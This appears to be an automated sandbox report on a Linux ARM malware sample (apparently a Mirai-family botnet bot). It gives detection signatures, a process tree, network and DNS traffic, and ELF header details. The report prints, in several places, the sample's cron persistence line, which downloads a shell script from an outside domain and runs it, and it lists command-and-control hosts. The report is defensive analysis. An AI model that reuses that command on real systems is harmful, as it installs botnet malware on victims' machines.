Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nsharm5.elf

Overview

General Information

Sample name:nsharm5.elf
Analysis ID:1542854
MD5:ec377a1b6a816a87c4874e7b04e53ab4
SHA1:e8e06aaacde689c4a8703aa7ff62d7442d541aca
SHA256:f8c9ae564656a7a30d4dcb95719e593e081a82a472a220e95c99096f35398795
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1542854
Start date and time:2024-10-26 19:11:27 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nsharm5.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@6/0
  • VT rate limit hit for: nsharm5.elf
Command:/tmp/nsharm5.elf
PID:5450
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • nsharm5.elf (PID: 5450, Parent: 5376, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nsharm5.elf
    • sh (PID: 5452, Parent: 5450, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 5454, Parent: 5452)
        • sh New Fork (PID: 5456, Parent: 5454)
        • crontab (PID: 5456, Parent: 5454, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5455, Parent: 5452)
      • crontab (PID: 5455, Parent: 5452, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nsharm5.elfReversingLabs: Detection: 21%
Source: tmp.ueTw0E.18.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 91.149.218.232 ports 22016,0,1,2,6,16557
Source: global trafficTCP traffic: 31.13.248.89 ports 0,1,2,3,6,21063
Source: global trafficTCP traffic: 192.168.2.13:53754 -> 31.13.248.89:21063
Source: global trafficTCP traffic: 192.168.2.13:50464 -> 91.149.218.232:22016
Source: global trafficTCP traffic: 192.168.2.13:36118 -> 213.182.204.57:20480
Source: /tmp/nsharm5.elf (PID: 5450)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.ueTw0E.18.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@6/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5456)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5455)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 5455)File: /var/spool/cron/crontabs/tmp.ueTw0EJump to behavior
Source: /usr/bin/crontab (PID: 5455)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nsharm5.elf (PID: 5452)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nsharm5.elf (PID: 5450)Queries kernel information via 'uname': Jump to behavior
Source: nsharm5.elf, 5450.1.00007ffd189cd000.00007ffd189ee000.rw-.sdmp, nsharm5.elf, 5457.1.00007ffd189cd000.00007ffd189ee000.rw-.sdmp, nsharm5.elf, 5503.1.00007ffd189cd000.00007ffd189ee000.rw-.sdmpBinary or memory string: Px86_64/usr/bin/qemu-arm/tmp/nsharm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nsharm5.elf
Source: nsharm5.elf, 5450.1.0000560b75998000.0000560b75b0e000.rw-.sdmp, nsharm5.elf, 5457.1.0000560b75998000.0000560b75b0e000.rw-.sdmp, nsharm5.elf, 5503.1.0000560b75998000.0000560b75b0e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nsharm5.elf, 5450.1.00007ffd189cd000.00007ffd189ee000.rw-.sdmp, nsharm5.elf, 5457.1.00007ffd189cd000.00007ffd189ee000.rw-.sdmp, nsharm5.elf, 5503.1.00007ffd189cd000.00007ffd189ee000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: nsharm5.elf, 5450.1.0000560b75998000.0000560b75b0e000.rw-.sdmp, nsharm5.elf, 5457.1.0000560b75998000.0000560b75b0e000.rw-.sdmp, nsharm5.elf, 5503.1.0000560b75998000.0000560b75b0e000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
Source: nsharm5.elf, 5503.1.00007ffd189cd000.00007ffd189ee000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
Direct Volume AccessOS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542854 Sample: nsharm5.elf Startdate: 26/10/2024 Architecture: LINUX Score: 60 30 31.13.248.89, 21063, 53754 NETERRA-ASBG Bulgaria 2->30 32 91.149.218.232, 16557, 22016, 41694 GECKONET-ASPL Poland 2->32 34 3 other IPs or domains 2->34 40 Multi AV Scanner detection for submitted file 2->40 42 Connects to many ports of the same IP (likely port scanning) 2->42 9 nsharm5.elf 2->9         started        signatures3 process4 process5 11 nsharm5.elf sh 9->11         started        13 nsharm5.elf 9->13         started        15 nsharm5.elf 9->15         started        process6 17 sh crontab 11->17         started        21 sh 11->21         started        23 nsharm5.elf 13->23         started        file7 28 /var/spool/cron/crontabs/tmp.ueTw0E, ASCII 17->28 dropped 36 Sample tries to persist itself using cron 17->36 38 Executes the "crontab" command typically for achieving persistence 17->38 25 sh crontab 21->25         started        signatures8 process9 signatures10 44 Executes the "crontab" command typically for achieving persistence 25->44
SourceDetectionScannerLabelLink
nsharm5.elf21%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    unknown
    kingstonwikkerink.dyn
    185.82.200.181
    truefalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://hailcocks.ru/wget.sh;tmp.ueTw0E.18.drfalse
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        213.182.204.57
        unknownLatvia
        9009M247GBfalse
        91.149.218.232
        unknownPoland
        198401GECKONET-ASPLtrue
        31.13.248.89
        unknownBulgaria
        34224NETERRA-ASBGtrue
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        213.182.204.57harm4.elfGet hashmaliciousUnknownBrowse
          mips.elfGet hashmaliciousUnknownBrowse
            hmips.elfGet hashmaliciousUnknownBrowse
              arm7.elfGet hashmaliciousUnknownBrowse
                mips.elfGet hashmaliciousUnknownBrowse
                  arm5.elfGet hashmaliciousUnknownBrowse
                    x86.elfGet hashmaliciousUnknownBrowse
                      91.149.218.232harm4.elfGet hashmaliciousUnknownBrowse
                        ppc.elfGet hashmaliciousUnknownBrowse
                          x86.elfGet hashmaliciousUnknownBrowse
                            31.13.248.89harm4.elfGet hashmaliciousUnknownBrowse
                              mpsl.elfGet hashmaliciousUnknownBrowse
                                mips.elfGet hashmaliciousUnknownBrowse
                                  arm4.elfGet hashmaliciousUnknownBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    kingstonwikkerink.dynharm4.elfGet hashmaliciousUnknownBrowse
                                    • 31.13.248.89
                                    mips.elfGet hashmaliciousUnknownBrowse
                                    • 81.29.149.178
                                    arm.elfGet hashmaliciousUnknownBrowse
                                    • 213.182.204.57
                                    hmips.elfGet hashmaliciousUnknownBrowse
                                    • 194.87.198.29
                                    arm7.elfGet hashmaliciousUnknownBrowse
                                    • 185.82.200.181
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 81.29.149.178
                                    ppc.elfGet hashmaliciousUnknownBrowse
                                    • 88.151.195.22
                                    mips.elfGet hashmaliciousUnknownBrowse
                                    • 88.151.195.22
                                    arm5.elfGet hashmaliciousUnknownBrowse
                                    • 88.151.195.22
                                    daisy.ubuntu.comsshd.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    nsharm6.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    harm4.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    .i.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    arm.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    c0r0n4x.arm6.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    c0r0n4x.x86.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    c0r0n4x.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.25
                                    c0r0n4x.arm5.elfGet hashmaliciousUnknownBrowse
                                    • 162.213.35.24
                                    xi.arm6.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 162.213.35.24
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    M247GBharm4.elfGet hashmaliciousUnknownBrowse
                                    • 213.182.204.57
                                    mips.elfGet hashmaliciousUnknownBrowse
                                    • 213.182.204.57
                                    T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                    • 91.202.233.141
                                    lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                    • 91.202.233.141
                                    Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                    • 91.202.233.141
                                    thcdVit1dX.exeGet hashmaliciousPhorpiexBrowse
                                    • 91.202.233.141
                                    botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 37.120.192.49
                                    la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                    • 77.36.125.19
                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                    • 172.94.54.116
                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                    • 154.17.88.71
                                    NETERRA-ASBGharm4.elfGet hashmaliciousUnknownBrowse
                                    • 31.13.248.89
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 31.13.248.89
                                    jade.x86.elfGet hashmaliciousMiraiBrowse
                                    • 212.73.131.247
                                    mips.elfGet hashmaliciousUnknownBrowse
                                    • 31.13.248.89
                                    arm4.elfGet hashmaliciousUnknownBrowse
                                    • 31.13.248.89
                                    https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                    • 93.123.102.190
                                    https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.htmlGet hashmaliciousUnknownBrowse
                                    • 93.123.102.185
                                    https://shorturl.at/5LwA8Get hashmaliciousUnknownBrowse
                                    • 93.123.102.147
                                    http://walletsupportdesk.com/Get hashmaliciousUnknownBrowse
                                    • 93.123.102.226
                                    http://www.web3walletsync.com/Get hashmaliciousUnknownBrowse
                                    • 93.123.102.192
                                    GECKONET-ASPLharm4.elfGet hashmaliciousUnknownBrowse
                                    • 91.149.218.232
                                    botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 91.234.13.57
                                    ppc.elfGet hashmaliciousUnknownBrowse
                                    • 91.149.218.232
                                    x86.elfGet hashmaliciousUnknownBrowse
                                    • 91.149.218.232
                                    aWoyoSGAsv.elfGet hashmaliciousMiraiBrowse
                                    • 45.82.146.198
                                    No context
                                    No context
                                    Process:/usr/bin/crontab
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):306
                                    Entropy (8bit):5.145441750364602
                                    Encrypted:false
                                    SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQ3ZZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig83feHLUHYC+GABjnOGAFkz
                                    MD5:B66224E7E5A328F292E38744D923C258
                                    SHA1:8E5DDF25BCC8B8AE79D2AEADBD7259903FFADFD7
                                    SHA-256:AB54C2FC4A3BD290FEC5A898AA9E62F0F08C2D02E609074B77065BF1FF3C5720
                                    SHA-512:A01E33D8C76B2419BD7427A132878DFC67BC4ACF6652006908889A63560DD32B6D1E3535062938156221ABBE8C6317D4090577C6000F6969D170DAD4238C32F3
                                    Malicious:true
                                    Reputation:low
                                    Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:12:10 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                    File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                    Entropy (8bit):6.067024738015449
                                    TrID:
                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                    File name:nsharm5.elf
                                    File size:75'108 bytes
                                    MD5:ec377a1b6a816a87c4874e7b04e53ab4
                                    SHA1:e8e06aaacde689c4a8703aa7ff62d7442d541aca
                                    SHA256:f8c9ae564656a7a30d4dcb95719e593e081a82a472a220e95c99096f35398795
                                    SHA512:1072be20d27f5346195d5608b835b87b52c86a7e121a64dde1065a24afba8486673401f74a435e0d872ef54785a3c566e7a8419b9504a5380afb97c1ac3fadc6
                                    SSDEEP:1536:/pBn6Hm2LCVs9M0mpmm29NPwwxO8hv2P:/pB6DL997Umm21x/+
                                    TLSH:D4732A85BD819A12C6D111BBFB6E428D772653A8D3EF3213DD256F20378782F0E67641
                                    File Content Preview:.ELF...a..........(.........4....#......4. ...(.......................................... ... ... .......T..........Q.td..................................-...L."...`@..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                    ELF header

                                    Class:ELF32
                                    Data:2's complement, little endian
                                    Version:1 (current)
                                    Machine:ARM
                                    Version Number:0x1
                                    Type:EXEC (Executable file)
                                    OS/ABI:ARM - ABI
                                    ABI Version:0
                                    Entry Point Address:0x8190
                                    Flags:0x2
                                    ELF Header Size:52
                                    Program Header Offset:52
                                    Program Header Size:32
                                    Number of Program Headers:3
                                    Section Header Offset:74708
                                    Section Header Size:40
                                    Number of Section Headers:10
                                    Header String Table Index:9
                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                    NULL0x00x00x00x00x0000
                                    .initPROGBITS0x80940x940x180x00x6AX004
                                    .textPROGBITS0x80b00xb00x101b80x00x6AX0016
                                    .finiPROGBITS0x182680x102680x140x00x6AX004
                                    .rodataPROGBITS0x1827c0x1027c0x19940x00x2A004
                                    .ctorsPROGBITS0x220000x120000x80x00x3WA004
                                    .dtorsPROGBITS0x220080x120080x80x00x3WA004
                                    .dataPROGBITS0x220140x120140x3800x00x3WA004
                                    .bssNOBITS0x223940x123940x510c0x00x3WA004
                                    .shstrtabSTRTAB0x00x123940x3e0x00x0001
                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                    LOAD0x00x80000x80000x11c100x11c106.14550x5R E0x8000.init .text .fini .rodata
                                    LOAD0x120000x220000x220000x3940x54a02.86220x6RW 0x8000.ctors .dtors .data .bss
                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 26, 2024 19:12:11.851536036 CEST5375421063192.168.2.1331.13.248.89
                                    Oct 26, 2024 19:12:11.856986046 CEST210635375431.13.248.89192.168.2.13
                                    Oct 26, 2024 19:12:11.857049942 CEST5375421063192.168.2.1331.13.248.89
                                    Oct 26, 2024 19:12:11.857269049 CEST5375421063192.168.2.1331.13.248.89
                                    Oct 26, 2024 19:12:11.862643003 CEST210635375431.13.248.89192.168.2.13
                                    Oct 26, 2024 19:12:11.862693071 CEST5375421063192.168.2.1331.13.248.89
                                    Oct 26, 2024 19:12:11.868099928 CEST210635375431.13.248.89192.168.2.13
                                    Oct 26, 2024 19:12:12.487915993 CEST210635375431.13.248.89192.168.2.13
                                    Oct 26, 2024 19:12:12.488184929 CEST5375421063192.168.2.1331.13.248.89
                                    Oct 26, 2024 19:12:12.495244980 CEST210635375431.13.248.89192.168.2.13
                                    Oct 26, 2024 19:12:17.503169060 CEST5046422016192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:17.508591890 CEST220165046491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:17.508671045 CEST5046422016192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:17.508717060 CEST5046422016192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:17.514050961 CEST220165046491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:17.514101982 CEST5046422016192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:17.519529104 CEST220165046491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:18.336895943 CEST220165046491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:18.337009907 CEST220165046491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:18.337034941 CEST5046422016192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:18.337066889 CEST5046422016192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:18.337413073 CEST5046422016192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:23.352381945 CEST4169416557192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:23.357945919 CEST165574169491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:23.358037949 CEST4169416557192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:23.358037949 CEST4169416557192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:23.363689899 CEST165574169491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:23.363755941 CEST4169416557192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:23.369267941 CEST165574169491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:24.222443104 CEST165574169491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:24.222496986 CEST165574169491.149.218.232192.168.2.13
                                    Oct 26, 2024 19:12:24.222731113 CEST4169416557192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:24.222731113 CEST4169416557192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:24.222731113 CEST4169416557192.168.2.1391.149.218.232
                                    Oct 26, 2024 19:12:29.254673004 CEST3611820480192.168.2.13213.182.204.57
                                    Oct 26, 2024 19:12:29.261521101 CEST2048036118213.182.204.57192.168.2.13
                                    Oct 26, 2024 19:12:29.261631012 CEST3611820480192.168.2.13213.182.204.57
                                    Oct 26, 2024 19:12:29.261631012 CEST3611820480192.168.2.13213.182.204.57
                                    Oct 26, 2024 19:12:29.268107891 CEST2048036118213.182.204.57192.168.2.13
                                    Oct 26, 2024 19:12:29.268173933 CEST3611820480192.168.2.13213.182.204.57
                                    Oct 26, 2024 19:12:29.277281046 CEST2048036118213.182.204.57192.168.2.13
                                    Oct 26, 2024 19:12:39.264308929 CEST3611820480192.168.2.13213.182.204.57
                                    Oct 26, 2024 19:12:39.269829035 CEST2048036118213.182.204.57192.168.2.13
                                    Oct 26, 2024 19:12:39.535340071 CEST2048036118213.182.204.57192.168.2.13
                                    Oct 26, 2024 19:12:39.535619974 CEST3611820480192.168.2.13213.182.204.57
                                    Oct 26, 2024 19:13:59.604604006 CEST3611820480192.168.2.13213.182.204.57
                                    Oct 26, 2024 19:13:59.610097885 CEST2048036118213.182.204.57192.168.2.13
                                    Oct 26, 2024 19:13:59.875272036 CEST2048036118213.182.204.57192.168.2.13
                                    Oct 26, 2024 19:13:59.875643015 CEST3611820480192.168.2.13213.182.204.57
                                    TimestampSource PortDest PortSource IPDest IP
                                    Oct 26, 2024 19:12:11.832717896 CEST4447753192.168.2.13194.36.144.87
                                    Oct 26, 2024 19:12:11.843488932 CEST5344477194.36.144.87192.168.2.13
                                    Oct 26, 2024 19:12:11.945108891 CEST5388753192.168.2.13194.36.144.87
                                    Oct 26, 2024 19:12:11.956197977 CEST5353887194.36.144.87192.168.2.13
                                    Oct 26, 2024 19:12:13.836700916 CEST3303153192.168.2.131.1.1.1
                                    Oct 26, 2024 19:12:13.836757898 CEST5576253192.168.2.131.1.1.1
                                    Oct 26, 2024 19:12:13.844894886 CEST53330311.1.1.1192.168.2.13
                                    Oct 26, 2024 19:12:13.845427990 CEST53557621.1.1.1192.168.2.13
                                    Oct 26, 2024 19:12:17.491790056 CEST4419953192.168.2.13194.36.144.87
                                    Oct 26, 2024 19:12:17.502489090 CEST5344199194.36.144.87192.168.2.13
                                    Oct 26, 2024 19:12:23.340369940 CEST4530853192.168.2.13194.36.144.87
                                    Oct 26, 2024 19:12:23.351807117 CEST5345308194.36.144.87192.168.2.13
                                    Oct 26, 2024 19:12:29.225003004 CEST3652053192.168.2.13217.160.70.42
                                    Oct 26, 2024 19:12:29.253680944 CEST5336520217.160.70.42192.168.2.13
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Oct 26, 2024 19:12:11.832717896 CEST192.168.2.13194.36.144.870x669cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:13.836700916 CEST192.168.2.131.1.1.10xb38cStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:13.836757898 CEST192.168.2.131.1.1.10x97Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                    Oct 26, 2024 19:12:17.491790056 CEST192.168.2.13194.36.144.870xcbaaStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.340369940 CEST192.168.2.13194.36.144.870x643cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:29.225003004 CEST192.168.2.13217.160.70.420x686aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:11.843488932 CEST194.36.144.87192.168.2.130x669cNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:13.844894886 CEST1.1.1.1192.168.2.130xb38cNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:13.844894886 CEST1.1.1.1192.168.2.130xb38cNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:17.502489090 CEST194.36.144.87192.168.2.130xcbaaNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                    Oct 26, 2024 19:12:23.351807117 CEST194.36.144.87192.168.2.130x643cNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
